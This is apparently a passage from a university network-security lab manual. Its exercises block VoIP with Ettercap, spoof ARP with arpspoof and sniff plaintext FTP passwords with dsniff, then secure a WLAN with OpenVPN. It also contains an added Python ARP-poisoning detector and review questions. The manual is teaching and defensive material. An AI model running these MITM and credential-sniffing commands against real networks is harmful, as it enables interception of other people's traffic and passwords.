
5.10 VoIP-Block

Target:

• Blocking of VoIP-communication

• Performing of test-calls

To deliver:

• VoIP-Block_x1

To use:

• Host C

Apart from monitoring a conversation it is also possible for us to completely block the use of VoIP. For this we use an interface of Ettercap which makes it possible to use external scripts (filters). You can find the necessary script "sip-block.ef" on the Auditor LiveCD in "/home/knoppix/Desktop/Scripts". For reference it is present both in *.txt and in the *.ef format necessary for Ettercap.

1. Copy the *.ef-format script to Host C:

root@HostD#cd /home/knoppix/Desktop/Scripts/

root@HostD#scp sip-block.ef root@192.168.0.10x1:

2. Establish a SSH-connection.

3. Block any SIP-communication between the Asterisk server and Host A. Start Ettercap with the script:

root@UMLHostC_x1#ettercap -i <intf> -Tq -F sip-block.ef \
    -M ARP /192.168.0.3x1,1x11/

4. Try to make a call between Host A and Host B.

5. Create a screenshot of the block-messages with "KSnapshot". Name: VoIP-Block_x1

6. Quit Ettercap (Important: use the "q"-command to stop Ettercap).

5.11 Password-Sniffing FTP-Account

Target:

• Performing of a MITM-attack

• Capture the password of a FTP-connection

To deliver:

• FTP-Detection_x1

• FTP-PW_x1

To use:

• Host C

• Host D

In this step we try to sniff passwords with the program-suite "Dsniff". As an example we try to obtain the login-information of a FTP-account. We use the program "Arpspoof" (provided by Dsniff) in order to perform an ARP-Spoofing attack against the FTP-server and a host.

1. Use Nmap on Host D again to scan the network for FTP-servers:

• Targets: 192.168.0.*

• Scan Type: SYN Stealth Scan

• Scanned Ports (Range Given Below): 21

Server 2 should be listed with the entry "21/tcp open ftp". This is our target.

2. Create a screenshot of the scan with "KSnapshot". Name: FTP-Detection_x1

3. Start a SSH-connection from Host D to Host C.

4. Make sure that the kernel of Host C can forward rerouted packets to the original target (this was deactivated by Ettercap in the previous part):

root@UMLHostC_x1#echo "1" > /proc/sys/net/ipv4/ip_forward

5. Use Arpspoof to reroute the IP of the FTP-Server to Host C:

root@UMLHostC_x1#arpspoof -i <intf> 192.168.0.3x1

6. Start sniffing with Dsniff within a second SSH-connection:

root@UMLHostC_x1#dsniff -c -m -i <intf>

7. Connect with a FTP-client (e.g. Windows Explorer) from Host A to the FTP-server of your group. Use the standard account "stud" and the password "rtk222". You should be able to see the login-information in plain text within the login-shell on Host C.

8. Create a screenshot of the login-information with "KSnapshot". Name: FTP-PW_x1

9. Quit Dsniff and arpspoof with CTRL+c.
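The ARP-poisoning used here with Arpspoof and in section 5.9 with Ettercap is visible to anyone watching ARP traffic on the segment: an address that suddenly resolves to a different MAC, or one MAC answering for both the server and a client. The following Python monitor is an added example, not part of the lab manual or of Ettercap/Dsniff; it parses raw Ethernet/ARP frames, and the frames, MACs and addresses it is fed are constructed test data (a real deployment would read frames from a raw socket or a pcap file).

```python
import struct
import ipaddress
from collections import defaultdict

ETH_HDR = struct.Struct("!6s6sH")          # dst MAC, src MAC, EtherType
ARP_HDR = struct.Struct("!HHBBH6s4s6s4s")  # htype, ptype, hlen, plen, oper, sha, spa, tha, tpa
ETHERTYPE_ARP, ARP_REPLY = 0x0806, 2

def mac_bytes(s):
    return bytes.fromhex(s.replace(":", ""))
def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)

def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Constructed test input: an ARP reply claiming 'sender_ip is-at sender_mac'."""
    eth = ETH_HDR.pack(mac_bytes(target_mac), mac_bytes(sender_mac), ETHERTYPE_ARP)
    arp = ARP_HDR.pack(1, 0x0800, 6, 4, ARP_REPLY,
                       mac_bytes(sender_mac), ipaddress.IPv4Address(sender_ip).packed,
                       mac_bytes(target_mac), ipaddress.IPv4Address(target_ip).packed)
    return eth + arp

def parse_arp(frame):
    """Return (oper, sender_mac, sender_ip) for an ARP frame, None for anything else."""
    if len(frame) < ETH_HDR.size + ARP_HDR.size or ETH_HDR.unpack_from(frame)[2] != ETHERTYPE_ARP:
        return None
    oper, sha, spa = ARP_HDR.unpack_from(frame, ETH_HDR.size)[4:7]
    return oper, mac_str(sha), str(ipaddress.IPv4Address(spa))

class ArpMonitor:
    """Learns IP-to-MAC bindings from ARP traffic and reports the two poisoning symptoms."""
    def __init__(self):
        self.ip_to_mac = {}
        self.mac_to_ips = defaultdict(set)
    def observe(self, frame):
        parsed = parse_arp(frame)
        if parsed is None:
            return []
        _, mac, ip = parsed
        alerts = []
        known = self.ip_to_mac.get(ip)
        if known is not None and known != mac:
            # Symptom 1: a known address suddenly resolves to a different MAC.
            alerts.append(f"{ip} moved from {known} to {mac}")
        self.ip_to_mac[ip] = mac
        self.mac_to_ips[mac].add(ip)
        if len(self.mac_to_ips[mac]) > 1:
            # Symptom 2: one MAC answers for several IPs (both ends of an arp:remote attack).
            alerts.append(f"{mac} claims {sorted(self.mac_to_ips[mac])}")
        return alerts
```

Feeding the monitor two legitimate replies and then the two forged ones of a bidirectional poisoning produces a "moved" alert on the first forgery and both a "moved" and a "claims" alert on the second.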

5.12 WLAN-protection with OpenVPN

Target:

• Creation of a VPN-connection from Host B to Server 1

• Performing of connectivity-tests

• Analyses of the connection

To deliver:

• VPN-Ethereal-tap_x1

• VPN-Ethereal-eth_1_x1

• VPN-Ethereal-eth_0_x1

• VPN-Ethereal-HostD_x1

To use:

• Host B

• Host D

• Server 1

In this step the weak WEP-encryption is to be replaced by a VPN-connection. We use the software OpenVPN. The goal is the association with the access-point and a subsequent connection between Host B and Server 1 via VPN. The interface 192.168.1.2 at Server 1 uses the packet-filter "iptables" to filter all packets which do not have the target port 1194 [7]. So it is guaranteed that only OpenVPN-authenticated users have access to the network 192.168.0.0/24. [8]

1. Connect with the WLAN-network of your group.

[7] Standard VPN port.

[8] With the utilisation of "iptables" the parallel work of multiple groups is not possible. So we do not use "iptables" here.

2. Make sure that in the OpenVPN-directory [9] on Host B the file vpn_wlan_HostB_x1.ovpn is present within the directory "config". In "Zertifikate" (certificates) vpn_wlan-ca.crt, HostB_x1.key and HostB_x1.crt should be present.

3. Start the VPN-connection with a right-click on the configuration-file and choose the "start" option. If the initialization does not end with "Initialisation Sequence Completed", or DHCP-related error-messages appear, try to deactivate the "tap"-interface within the "Netzwerkverbindungen" (Windows network connections) and then reactivate it. Afterwards try to establish a new connection.

4. It should be possible to ping the virtual interface 10.4.0.1 on Server 1. If this is the case, you have an encrypted tunnel between Host B and Server 1.

5. Use the Windows-command "ipconfig". A TAP-interface with an assigned IP from the 10.4.0.0/16-network should appear. Together with Server 1 (10.4.0.1) this interface builds the tunnel. The configuration of Server 1 causes a complete rerouting of the network traffic of Host B over the VPN interface 10.4.0.1.

6. Verify this by establishing a FTP-connection from Host B to Server 2. Transfer the test-file. Start Ethereal on Server 1 and begin data-capturing on the "tap"-interface. It should show a FTP-connection between the tunnel end on Host B (10.4.0.2-6 [10]) and Server 2.

7. Create a screenshot with "KSnapshot". Name: VPN-Ethereal-tap_x1

8. Start a new recording with Ethereal. Use the interface connected to the 192.168.1.0/24 network. You should see that all traffic is led over the VPN tunnel on port 1194.

9. Create a screenshot with "KSnapshot". Name: VPN-Ethereal-eth_1_x1

10. Start a third recording. Use the interface connected to the 192.168.0.0/24-network. You should see a connection between the tunnel-end on Server 2 and Host B.

11. Create a screenshot with "KSnapshot". Name: VPN-Ethereal-eth_0_x1

12. Deactivate the WEP-encryption on Host B and the accesspoint.

[9] Standard: C:\Programme\OpenVPN

[10] Assigned by the IP-pool on Server 1.

13. Sniff the WLAN-connection from Host D and create a screenshot with "KSnapshot". Name: VPN-Ethereal-HostD_x1

14. Stop the FTP-transfer.

15. Save your screenshots and delete them.

Chapter 6

Interpretation of test results

Please answer the following questions after completion of the lab-test:

1. How can throughput problems be avoided within WLAN-networks?

2. Name further alternatives to WEP and OpenVPN.

3. Which possibilities exist to secure SSH?

4. How could MITM ARP attacks be uncovered?

5. How could MITM ARP attacks be repelled?
